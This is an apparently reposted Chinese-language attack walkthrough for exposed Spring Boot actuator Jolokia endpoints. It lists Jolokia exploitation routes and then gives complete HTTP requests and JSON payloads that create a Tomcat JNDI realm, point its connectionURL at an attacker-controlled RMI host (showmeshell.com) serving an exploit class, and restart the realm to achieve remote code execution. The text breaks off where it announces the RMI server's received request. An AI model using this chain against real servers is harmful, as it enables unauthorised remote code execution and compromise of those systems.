环境搭建
Java项⽬中使⽤spring-boot-starter-actuator 组件时,会注册并暴露actuators管理接⼝,在spring 1.x版本中,默认全部管理接⼝都暴露,在Spring 2.x版本中,默
认只暴露health、info这两个接⼝,如果有特殊需要,可通过Spring配置⽂件添加。
<!--增加spring管理端controller,测试⽬录扫描-->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
<version>${spring-boot-starter-web.version}</version>
</dependency>
Jolokia简介
Jolokia是Java中⽤于远程访问MBeans的接⼝,通过jolokia接⼝可控制Java Bean,实现远程Bean调⽤。
Jolokia的常⻅利⽤思路
⚪利⽤Type=ch.qos.logback.classic.jmx.JMXConfigurator 实现XXE
⚪利⽤type=MBeanFactory 实现RCE
⚪利⽤getProperty ⽅法读取Spring配置⽂件中的配置(带*的密码)
实战
访问jolokia-list接⼝,查看所有的bean列表,搜索之后发现存在type=MBeanFactory ,该bean可⽤于创建JNDI上下⽂,然后通过JNDI请求实现RCE。
**tips:**找到MBeanFactory后,需要寻找该json节点对应的上层节点名称,⼀般是Tomcat或Catalina
所以,该⽬标可使⽤
1.通过MBeanFactory接⼝的createJNDIRealm⽅法,创建realm对象
{
"mbean": "Tomcat:type=MBeanFactory",
"type": "EXEC",
"operation": "createJNDIRealm",
"arguments": ["Tomcat:type=Engine"]
}
2.通过realm对象创建上下⽂
{
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "contextFactory",
"value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}
3.写⼊JNDI地址
POST /actuator/jolokia HTTP/1.1
Host:xxx.xxx.xx
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2269.0
Safari/537.36138
Accept-Encoding:gzip, deflate
Accept:*/*
Connection:keep-alive
{
“mbean”: “Catalina:realmPath=/realm0,type=Realm”,
“type”: “WRITE”,
“attribute”: “connectionURL”,
“value”: “rmi://xxxx.bbb3.showmeshell.com:1099/Exploit_e4bc88baa83ffecffdfd44ea053727e8”
}
{
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "connectionURL",
"value": "rmi://bbc3.showmeshell.com:1099/Exploit_7a0485c5a9d6a499e83daccfafb036fa"
}
4.重启Realm,触发JNDI请求,实现RCE
停⽌realm
POST /actuator/jolokia HTTP/1.1
Host:xxx.xxx.xx
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10101) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2269.0
Safari/537.36138
Accept-Encoding:gzip, deflate
Accept:/
Connection:keep-alive
Content-Type:application/json
{
“mbean”: “Catalina:realmPath=/realm0,type=Realm”,
“type”: “EXEC”,
“operation”: “stop”,
“arguments”: []
}
启动realm
POST /actuator/jolokia HTTP/1.1
Host:xxx.xxx.xx
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10101) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2269.0
Safari/537.36138
Accept-Encoding:gzip, deflate
Accept:/
Connection:keep-alive
Content-Type:application/json
{
“mbean”: “Catalina:realmPath=/realm0,type=Realm”,
“type”: “EXEC”,
“operation”: “start”,
“arguments”: []
}
然后,RMI服务器接收到如下请求:
本文迁移自知识星球“火线Zone”
